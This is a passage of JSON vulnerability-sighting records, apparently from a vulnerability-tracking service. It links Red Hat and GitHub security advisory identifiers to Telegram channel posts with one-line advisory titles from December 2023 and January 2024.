"author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0019", "type": "seen", "source": "https://t.me/ctinow/161597", "content": "https://ift.tt/owivD9T\nRHSA-2024:0019: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:40.000000Z"}, {"uuid": "4e024215-1e0b-4ca7-b731-1e90fbe29360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0022", "type": "seen", "source": "https://t.me/ctinow/161595", "content": "https://ift.tt/fELk1WI\nRHSA-2024:0022: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:38.000000Z"}, {"uuid": "84f621f7-f04f-418b-8168-498ea1196b28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59C9-PXQ8-9C73", "type": "seen", "source": "https://t.me/ctinow/161386", "content": "https://ift.tt/QsnFqi8\nCVE-2023-50422 | SAP cloud-security-services-integration-library up to 2.16.x/3.2.x authorization (GHSA-59c9-pxq8-9c73)", "creation_timestamp": "2024-01-01T17:41:37.000000Z"}, {"uuid": "efba59a5-fd4e-4bb3-85b5-f5cdaaafeda3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MJG-37CP-42X5", "type": "seen", "source": "https://t.me/ctinow/161322", "content": "https://ift.tt/1k6Iqiz\nCVE-2023-50423 | SAP sap-xssec up to 4.0.0 authorization (GHSA-6mjg-37cp-42x5)", "creation_timestamp": "2024-01-01T15:06:54.000000Z"}, {"uuid": "cbc7ff0f-4345-4746-9ba5-f004d96280cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QXRJ-HX23-XP82", "type": "seen", "source": "https://t.me/ctinow/161319", "content": "https://ift.tt/alRQYik\nCVE-2023-49803 | koajs cors up to 4.x origin validation (GHSA-qxrj-hx23-xp82)", "creation_timestamp": "2024-01-01T15:06:50.000000Z"}, {"uuid": "a30442e3-ca8c-4416-b633-9a66ebcbd846", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0157", "type": "seen", "source": "https://t.me/ctinow/166099", "content": "https://ift.tt/7KIQvWU\nRHSA-2024:0157: Important: .NET 7.0 security update", "creation_timestamp": "2024-01-10T20:18:47.000000Z"}, {"uuid": "d99bf3fc-aaf6-4b04-9f76-10283290b1f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0158", "type": "seen", "source": "https://t.me/ctinow/166098", "content": "https://ift.tt/NdH07aQ\nRHSA-2024:0158: Important: .NET 6.0 security update", "creation_timestamp": "2024-01-10T20:18:46.000000Z"}, {"uuid": "4db806b5-5bae-43f0-8b6e-d2c79e79343c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0150", "type": "seen", "source": "https://t.me/ctinow/165960", "content": "https://ift.tt/4kRdCl9\nRHSA-2024:0150: Important: .NET 8.0 security update", "creation_timestamp": "2024-01-10T17:17:25.000000Z"}, {"uuid": "64a7862d-416b-4c7e-9734-0ff37b65e7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0151", "type": "seen", "source": "https://t.me/ctinow/165959", "content": "https://ift.tt/jaTGuUt\nRHSA-2024:0151: Important: .NET 7.0 security update", "creation_timestamp": "2024-01-10T17:17:23.000000Z"}, {"uuid": "29cc120e-b53b-4c3e-8ef7-b4064de99fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0152", "type": "seen", "source": "https://t.me/ctinow/165958", "content": "https://ift.tt/owRnSJm\nRHSA-2024:0152: Important: .NET 8.0 security update", "creation_timestamp": "2024-01-10T17:17:22.000000Z"}, {"uuid": "167dc3b9-df44-4d57-b52f-4837a2c811da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0141", "type": "seen", "source": "https://t.me/ctinow/165854", "content": "https://ift.tt/VC7qOjh\nRHSA-2024:0141: Moderate: ipa security update", "creation_timestamp": "2024-01-10T15:16:27.000000Z"}, {"uuid": "6ed72712-7394-47e4-b56e-020012bd9aa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0097", "type": "seen", "source": "https://t.me/ctinow/165138", "content": "https://ift.tt/uKxD1T2\nRHSA-2024:0097: Moderate: Red Hat Single Sign-On 7.6.6 for OpenShift image enhancement and security update", "creation_timestamp": "2024-01-09T17:17:24.000000Z"}, {"uuid": "2ad518a1-7ea4-416c-b170-0bbb0091a434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0098", "type": "seen", "source": "https://t.me/ctinow/165137", "content": "https://ift.tt/bQKpRj2\nRHSA-2024:0098: Moderate: Red Hat Single Sign-On 7.6.6 security update", "creation_timestamp": "2024-01-09T17:17:23.000000Z"}, {"uuid": "c53644c0-b6d1-4801-b1d4-01347570bb98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CX99-25HR-5JXF", "type": "seen", "source": "https://t.me/ctinow/165903", "content": "https://ift.tt/3U8Zgfv\n[GHSA-cx99-25hr-5jxf] Pimcore Ecommerce Framework Bundle Improper Access Control allows unprivileged user to access back-office orders list", "creation_timestamp": "2024-01-10T16:26:48.000000Z"}, {"uuid": "84c716a4-db71-42a1-b059-9cfc65a93fec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PPXX-5M9H-6VXF", "type": "seen", "source": "https://t.me/ctinow/165899", "content": "https://ift.tt/7L2j8VP\n[GHSA-ppxx-5m9h-6vxf] quic-go's path validation mechanism can be exploited to cause denial of service", "creation_timestamp": "2024-01-10T16:16:52.000000Z"}, {"uuid": "f3684cab-67c5-40cc-a501-84ac9b0ecace", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5C8-RQWP-CP95", "type": "seen", "source": "https://t.me/ctinow/166647", "content": "https://ift.tt/IvZ5HKW\n[GHSA-h5c8-rqwp-cp95] Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter", "creation_timestamp": "2024-01-11T17:07:47.000000Z"}, {"uuid": "2f6f4cd2-2df5-40ca-922c-297417751e02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0154", "type": "seen", "source": "https://t.me/ctinow/166035", "content": "https://ift.tt/Sbur0KP\nRHSA-2024:0154: Low: openssl security update", "creation_timestamp": "2024-01-10T18:16:47.000000Z"}, {"uuid": "c75844a6-5812-4f01-9609-3ce176ee2215", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0155", "type": "seen", "source": "https://t.me/ctinow/166034", "content": "https://ift.tt/ownCmdV\nRHSA-2024:0155: Moderate: gnutls security update", "creation_timestamp": "2024-01-10T18:16:46.000000Z"}, {"uuid": "3743deee-3c4f-4a31-9397-ae36e068cb80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MC3W-RV8P-F9XF", "type": "seen", "source": "https://t.me/ctinow/161255", "content": "https://ift.tt/kChl8sE\nCVE-2023-50429 | IzyBat Orange Casiers prior 20230803_1 getEnsemble.php sql injection (GHSA-mc3w-rv8p-f9xf)", "creation_timestamp": "2024-01-01T09:56:37.000000Z"}, {"uuid": "5896711d-07f6-4ad8-8888-90beef095d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPMX-564X-H2MH", "type": "seen", "source": "https://t.me/ctinow/160220", "content": "https://ift.tt/oGA8O9S\n[GHSA-wpmx-564x-h2mh] ewen-lbh/ffcss Late-Unicode normalization vulnerability", "creation_timestamp": "2023-12-28T22:26:16.000000Z"}, {"uuid": "0e761552-5c82-41d6-b0d5-56aa92865d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8525-52VG-JV6V", "type": "seen", "source": "https://t.me/ctinow/165312", "content": "https://ift.tt/8gHwe56\n[GHSA-8525-52vg-jv6v] Qualys Jenkins Plugin for Policy Compliance XML External Entity vulnerability", "creation_timestamp": "2024-01-09T20:07:32.000000Z"}, {"uuid": "dcbc559f-af2b-4308-988a-4ad4988fdbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJRM-Q4H5-V3R2", "type": "seen", "source": "https://t.me/ctinow/158245", "content": "https://ift.tt/ufARyqe\nCVE-2023-48314 | CollaboraOnline prior 23.5.403 Built-in CODE Server App proxy.php cross site scripting (GHSA-qjrm-q4h5-v3r2)", "creation_timestamp": "2023-12-22T08:51:33.000000Z"}, {"uuid": "9d117d94-d63d-496c-aceb-bc2e3b8c92fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-733R-8XCP-W9MR", "type": "seen", "source": "https://t.me/ctinow/163720", "content": "https://ift.tt/3KME9bL\n[GHSA-733r-8xcp-w9mr] Flarum's logout Route allows open redirects", "creation_timestamp": "2024-01-05T22:01:27.000000Z"}, {"uuid": "5bd258d8-2cc6-4bb0-9c57-d80bb3dca434", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0399", "type": "seen", "source": "https://t.me/ctinow/172734", "content": "https://ift.tt/4YseOyM\nRHSA-2024:0399: Moderate: gnutls security update", "creation_timestamp": "2024-01-24T13:16:16.000000Z"}, {"uuid": "e4359391-2f3b-4a79-974e-4777f1d67920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0292", "type": "seen", "source": "https://t.me/ctinow/172390", "content": "https://ift.tt/VrTFg9u\nRHSA-2024:0292: Moderate: OpenShift Container Platform 4.14.10 security update", "creation_timestamp": "2024-01-23T23:16:33.000000Z"}, {"uuid": "c59c15c0-1a78-4912-a87b-a897ad40f2e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F67F-2J6R-M4C9", "type": "seen", "source": "https://t.me/ctinow/173150", "content": "https://ift.tt/AobBLVd\n[GHSA-f67f-2j6r-m4c9] Non-constant time webhook token comparison in Jenkins GitLab Branch Source Plugin", "creation_timestamp": "2024-01-24T23:06:41.000000Z"}, {"uuid": "cc931932-6ed4-4642-a146-2b3cc5f6964a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0430", "type": "seen", "source": "https://t.me/ctinow/172977", "content": "https://ift.tt/Rv4p7md\nRHSA-2024:0430: Moderate: python3 security update", "creation_timestamp": "2024-01-24T18:21:20.000000Z"}, {"uuid": "c10a9f41-1932-418a-8d86-e6c038484f5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0413", "type": "seen", "source": "https://t.me/ctinow/172968", "content": "https://ift.tt/AipmtwF\nRHSA-2024:0413: Moderate: libxml2 security update", "creation_timestamp": "2024-01-24T18:16:31.000000Z"}, {"uuid": "00747e8b-370c-4b83-9243-f861cf21ce6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0416", "type": "seen", "source": "https://t.me/ctinow/172967", "content": "https://ift.tt/zDYfBAv\nRHSA-2024:0416: Moderate: ncurses security update", "creation_timestamp": "2024-01-24T18:16:30.000000Z"}, {"uuid": "cb65b9cf-b624-4111-99dc-fa568f1173b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J5G9-J7R4-6QVX", "type": "seen", "source": "https://t.me/ctinow/172332", "content": "https://ift.tt/5Jwxi0F\nCVE-2024-21622 | Craft CMS up to 3.9.5/4.4.15 privileges management (GHSA-j5g9-j7r4-6qvx)", "creation_timestamp": "2024-01-23T22:01:55.000000Z"}, {"uuid": "61b5f271-825e-4558-98a0-0cf9e48041c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-437M-7HJ5-9MPW", "type": "seen", "source": "https://t.me/ctinow/172118", "content": "https://ift.tt/Y540nqU\nCVE-2023-30617 | openkruise Kruise up to 1.3.0/1.4.0/1.5.1 kruise-daemon pod unnecessary privileges (GHSA-437m-7hj5-9mpw)", "creation_timestamp": "2024-01-23T16:56:40.000000Z"}, {"uuid": "d936881d-e6f5-4f41-ab29-75aa538b9633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CVG-W29M-J8XC", "type": "seen", "source": "https://t.me/ctinow/173152", "content": "https://ift.tt/2i9wBFO\n[GHSA-2cvg-w29m-j8xc] Arbitrary Code Execution in Processwire", "creation_timestamp": "2024-01-24T23:06:43.000000Z"}, {"uuid": "85364281-29d9-48df-a0d3-186603b308d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ23-G58M-799R", "type": "seen", "source": "https://t.me/ctinow/172843", "content": "https://ift.tt/DpvwLsA\n[GHSA-fq23-g58m-799r] Cross-site Scripting Vulnerability on Data Import", "creation_timestamp": "2024-01-24T15:32:27.000000Z"}, {"uuid": "ae6ceb29-544d-4cff-8658-e5786551d681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q68H-XWQ5-MM7X", "type": "seen", "source": "https://t.me/ctinow/172842", "content": "https://ift.tt/jkeYmUM\n[GHSA-q68h-xwq5-mm7x] Cross-site Scripting Vulnerability on Avatar Upload", "creation_timestamp": "2024-01-24T15:32:26.000000Z"}, {"uuid": "67484e2a-c3d4-488f-b559-8bae27f94f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QH2W-9M7W-HJG2", "type": "seen", "source": "https://t.me/ctinow/172841", "content": "https://ift.tt/qC4wguh\n[GHSA-qh2w-9m7w-hjg2] Cross-site Scripting in JFinal", "creation_timestamp": "2024-01-24T15:32:26.000000Z"}, {"uuid": "5b4741b3-1d4a-44db-a397-66135e5ef01f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-353Q-7H99-HF4X", "type": "seen", "source": "https://t.me/ctinow/172713", "content": "https://ift.tt/3cSDBiy\nCVE-2023-7210 | OneNav up to 0.9.33 API /index.php X-Token improper authentication (GHSA-353q-7h99-hf4x)", "creation_timestamp": "2024-01-24T12:41:21.000000Z"}, {"uuid": "a2e0ef23-fa4c-49a9-b3a8-1f7f059b7444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FMX4-26R3-WXPF", "type": "seen", "source": "https://t.me/ctinow/172587", "content": "https://ift.tt/NWSJaVZ\nCVE-2024-22051 | CommonMarker up to 0.23.3 integer overflow (GHSA-fmx4-26r3-wxpf)", "creation_timestamp": "2024-01-24T09:11:53.000000Z"}, {"uuid": "5bc0652d-31a3-4c87-b353-869a1f378bdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PX7-JM2P-6H2C", "type": "seen", "source": "https://t.me/ctinow/172586", "content": "https://ift.tt/nXCWxrw\nCVE-2024-0241 | encoded_id-rails up to 1.0.0.beta1 HTTP Request id resource consumption (GHSA-3px7-jm2p-6h2c)", "creation_timestamp": "2024-01-24T09:11:52.000000Z"}, {"uuid": "f85c97ec-46f6-46ba-b81d-b1716c2bbc38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G9J-G5JG-3VV3", "type": "seen", "source": "https://t.me/ctinow/173109", "content": "https://ift.tt/giqAJdN\n[GHSA-7g9j-g5jg-3vv3] Unauthenticated Nonce Increment in snow", "creation_timestamp": "2024-01-24T22:06:58.000000Z"}, {"uuid": "25596b5b-d83d-4e13-83a2-cd3b781c6b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F9P-CP3C-72JF", "type": "seen", "source": "https://t.me/ctinow/173098", "content": "https://ift.tt/tjcUk8H\n[GHSA-9f9p-cp3c-72jf] Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') in trillium-http and trillium-client", "creation_timestamp": "2024-01-24T21:36:58.000000Z"}, {"uuid": "c45e3141-e6e3-4a61-ac70-db3098810779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0290", "type": "seen", "source": "https://t.me/ctinow/172339", "content": "https://ift.tt/PmsW9K0\nRHSA-2024:0290: Important: OpenShift Container Platform 4.14.10 bug fix and security update", "creation_timestamp": "2024-01-23T22:16:37.000000Z"}, {"uuid": "64383fdc-6d2d-419c-a2da-2101e0b69fa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0293", "type": "seen", "source": "https://t.me/ctinow/172338", "content": "https://ift.tt/H9raisR\nRHSA-2024:0293: Moderate: OpenShift Container Platform 4.14.10 packages and security update", "creation_timestamp": "2024-01-23T22:16:36.000000Z"}, {"uuid": "cfec1925-fffc-4cd0-a38b-c9c73ae674f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W59H-378F-2FRM", "type": "seen", "source": "https://t.me/ctinow/172079", "content": "https://ift.tt/zvnGw2R\n[GHSA-w59h-378f-2frm] Unsound sending of non-Send types across threads in threadalone", "creation_timestamp": "2024-01-23T15:56:41.000000Z"}, {"uuid": "0b7d9ea4-a475-45c3-a9e4-523d48538d25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4XV-795H-RV4H", "type": "seen", "source": "https://t.me/ctinow/172078", "content": "https://ift.tt/y6tAfOh\n[GHSA-v4xv-795h-rv4h] XSS potential in rendered Markdown fields (comments, description, notes, etc.)", "creation_timestamp": "2024-01-23T15:56:39.000000Z"}, {"uuid": "bd2f7506-6d55-4f21-9f93-b3cd1f09f089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4Q3-7G4Q-X89M", "type": "seen", "source": "https://t.me/ctinow/172077", "content": "https://ift.tt/Cmqislf\n[GHSA-r4q3-7g4q-x89m] Spring Framework server Web DoS Vulnerability", "creation_timestamp": "2024-01-23T15:56:38.000000Z"}, {"uuid": "88e50cc5-96f9-4721-8f52-114239f6e731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VM7-V8WJ-3FQW", "type": "seen", "source": "https://t.me/ctinow/172076", "content": "https://ift.tt/slCtnBx\n[GHSA-9vm7-v8wj-3fqw] keycloak-core: open redirect via \"form_post.jwt\" JARM response mode", "creation_timestamp": "2024-01-23T15:56:36.000000Z"}, {"uuid": "f30cef3f-6ebb-46a6-872a-e4be9aa1187a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C2G-HX49-7H25", "type": "seen", "source": "https://t.me/ctinow/172075", "content": "https://ift.tt/T9cypBQ\n[GHSA-4c2g-hx49-7h25] Prototype pollution not blocked by object-path related utilities in hoolock", "creation_timestamp": "2024-01-23T15:56:35.000000Z"}, {"uuid": "0e7f4368-0ce2-4f90-817b-02055a7fc458", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5V5R-RGHF-RM6Q", "type": "seen", "source": "https://t.me/ctinow/162839", "content": "https://ift.tt/YkF9Ndm\nCVE-2023-41337 | h2o up to 2.3.0-beta2 X.509 Certificate signature verification (GHSA-5v5r-rghf-rm6q)", "creation_timestamp": "2024-01-04T08:41:37.000000Z"}, {"uuid": "778a86b6-1740-40e0-994a-ecc357c7f9d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:4509", "type": "seen", "source": "https://t.me/ctinow/162838", "content": "https://ift.tt/9fOLUyK\nCVE-2023-5379 | Undertow AJP Request denial of service (RHSA-2023:4509)", "creation_timestamp": "2024-01-04T08:41:36.000000Z"}, {"uuid": "8c1c2206-0cba-4784-a4b4-1f98b49b7fb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8MP-X433-5WPF", "type": "seen", "source": "https://t.me/ctinow/162622", "content": "https://ift.tt/XoCmQWi\n[GHSA-f8mp-x433-5wpf] Arbitrary remote code execution within `wrangler dev` Workers sandbox", "creation_timestamp": "2024-01-03T22:36:48.000000Z"}, {"uuid": "eae87e52-4f7e-4f4a-b08a-901ddfcc995a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CFPH-4QQH-W828", "type": "seen", "source": "https://t.me/ctinow/162621", "content": "https://ift.tt/JufI6RU\n[GHSA-cfph-4qqh-w828] Arbitrary remote file read in Wrangler dev server", "creation_timestamp": "2024-01-03T22:36:47.000000Z"}, {"uuid": "09c3000b-6d9c-4813-a163-0e99f9f61eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHM2-RQ8Q-WRHC", "type": "seen", "source": "https://t.me/ctinow/161930", "content": "https://ift.tt/96SOZwC\n[GHSA-ghm2-rq8q-wrhc] Potential Actions command injection in output filenames (GHSL-2023-275)", "creation_timestamp": "2024-01-02T17:56:32.000000Z"}, {"uuid": "a12e5ec1-11a0-4bbd-a707-adfc387fa22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCPH-M25J-8J63", "type": "seen", "source": "https://t.me/ctinow/161929", "content": "https://ift.tt/7thK2Ai\n[GHSA-mcph-m25j-8j63] tj-actions/changed-files has Potential Actions command injection in output filenames (GHSL-2023-271)", "creation_timestamp": "2024-01-02T17:56:31.000000Z"}, {"uuid": "371b14b3-2b49-4d4e-b835-a77f34ea10d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0343", "type": "seen", "source": "https://t.me/ctinow/172197", "content": "https://ift.tt/TjtwfCi\nRHSA-2024:0343: Moderate: LibRaw security update", "creation_timestamp": "2024-01-23T18:16:48.000000Z"}, {"uuid": "f07a4193-9468-40a1-8ebd-090975e0226d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0345", "type": "seen", "source": "https://t.me/ctinow/172196", "content": "https://ift.tt/bpiDAtY\nRHSA-2024:0345: Moderate: python-pillow security update", "creation_timestamp": "2024-01-23T18:16:47.000000Z"}, {"uuid": "e006cb1b-c457-4a66-8444-7b0772d9d477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0371", "type": "seen", "source": "https://t.me/ctinow/172194", "content": "https://ift.tt/OQUh2p8\nRHSA-2024:0371: Important: kpatch-patch security update", "creation_timestamp": "2024-01-23T18:16:45.000000Z"}, {"uuid": "ea324acc-384f-4a75-9e67-00a8bd8449f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0346", "type": "seen", "source": "https://t.me/ctinow/172195", "content": "https://ift.tt/Z1GwzOa\nRHSA-2024:0346: Important: kernel security and bug fix update", "creation_timestamp": "2024-01-23T18:16:46.000000Z"}, {"uuid": "f2b68ad9-c572-487e-8475-099cbbd5b54b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0374", "type": "seen", "source": "https://t.me/ctinow/172193", "content": "https://ift.tt/MHUvnek\nRHSA-2024:0374: Moderate: python-pip security update", "creation_timestamp": "2024-01-23T18:16:44.000000Z"}, {"uuid": "8ca3ca56-2434-4bee-9a32-c886c02d243e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHJ7-W3F6-CVFJ", "type": "seen", "source": "https://t.me/ctinow/172073", "content": "https://ift.tt/9Bphl5k\n[GHSA-chj7-w3f6-cvfj] Code Injection in paddlepaddle", "creation_timestamp": "2024-01-23T15:56:32.000000Z"}, {"uuid": "f09adbef-231d-46ea-91c2-2a460377a3ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0288", "type": "seen", "source": "https://t.me/ctinow/172546", "content": "https://ift.tt/IKskvuY\nRHSA-2024:0288: Moderate: OpenShift Container Platform 4.13.30 security update", "creation_timestamp": "2024-01-24T07:16:29.000000Z"}, {"uuid": "57829734-724e-4eb4-8e48-666b0c632fcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H9G-X5RV-25WG", "type": "seen", "source": "https://t.me/ctinow/172149", "content": "https://ift.tt/g6MjSqc\nCVE-2024-21908 | TinyMCE up to 5.8.x Editor cross site scripting (GHSA-5h9g-x5rv-25wg)", "creation_timestamp": "2024-01-23T17:26:51.000000Z"}, {"uuid": "b25b4b2e-977a-4205-a3d2-c53b57a386b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FRXM-V7Q3-V2WV", "type": "seen", "source": "https://t.me/ctinow/172068", "content": 